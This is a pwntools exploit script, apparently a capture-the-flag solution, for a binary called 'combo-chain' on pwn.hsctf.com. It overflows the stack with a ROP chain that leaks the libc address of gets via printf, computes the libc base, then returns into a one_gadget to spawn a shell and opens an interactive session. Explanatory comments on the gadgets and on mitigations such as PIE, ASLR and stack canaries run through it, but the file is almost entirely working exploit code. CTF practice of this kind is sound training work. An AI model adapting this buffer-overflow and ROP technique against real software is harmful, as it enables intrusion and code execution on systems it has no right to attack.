from pwn import *

# Connection and binaries.  `e` is the challenge binary; `libc` is whatever
# pwntools resolves for it via e.libc, so the libc offsets used below are only
# meaningful if that object matches the libc running on the remote host.
r = remote('pwn.hsctf.com', 2345)
e = ELF('./combo-chain')
libc = e.libc

# Short aliases for the pwntools tube helpers used in this script.
ru = lambda a: r.recvuntil(a)
sl = lambda a: r.sendline(a)
sa = lambda a, b: r.sendafter(a, b)
sla = lambda a, b: r.sendlineafter(a, b)
ex = lambda : r.interactive()

# Addresses.  gets_got / printf_plt / main are read from the binary and used
# as absolute values, so the binary is assumed to be non-PIE (the hard-coded
# 0x40xxxx values below say the same).  `pr` and `nop` are gadget addresses
# inside the binary; from their use they are presumably a "pop rdi; ret" and a
# plain "ret" for stack alignment -- neither is shown here, confirm against
# the disassembly.  `one_gadget` is a libc-relative offset that only holds for
# one specific libc build.
gets_offset = libc.symbols['gets']
gets_got = e.got['gets']
printf_plt = e.plt['printf']
main = e.symbols['main']
pr = 0x0000000000401263
nop = 0x000000000040114f
one_gadget = 0x4526a

# Stage 1.  The 16 bytes of filler presumably run up to the saved return
# address; the chain then calls printf with the GOT entry of gets as its
# argument, so the resolved libc address of gets is written to the socket,
# and finally returns to main so a second input can be sent.
# Why this works (and what stops it): the GOT and gadget addresses are fixed
# because the binary is not PIE, and nothing detects the overwritten return
# address.  PIE together with ASLR removes the fixed addresses, and a stack
# canary aborts the function before the corrupted return address is used.
p = ""
p += "\x90"*16
p += p64(pr)
p += p64(gets_got)
p += p64(nop)
p += p64(printf_plt)
p += p64(main)
sla(": ", p)

# Read the 6 significant bytes of the printed pointer (x86-64 user-space
# addresses fit in 6 bytes), zero-pad to 8 for u64, and derive the libc base
# by subtracting the symbol offset.  recv(6) assumes the address is the first
# thing printf emits and that it arrives in a single read; any preceding
# output would corrupt the leak.
leaked = u64(r.recv(6).ljust(8, "\x00"))
print hex(leaked)  # Python 2 print statement: this script is Python 2 only
libc_base = leaked - gets_offset
one_shot = libc_base + one_gadget

# Stage 2.  Same filler, then return into the computed libc address, and hand
# the connection over to the user.
p = ""
p += "\x90"*16
p += p64(one_shot)
sla(": ", p)
ex()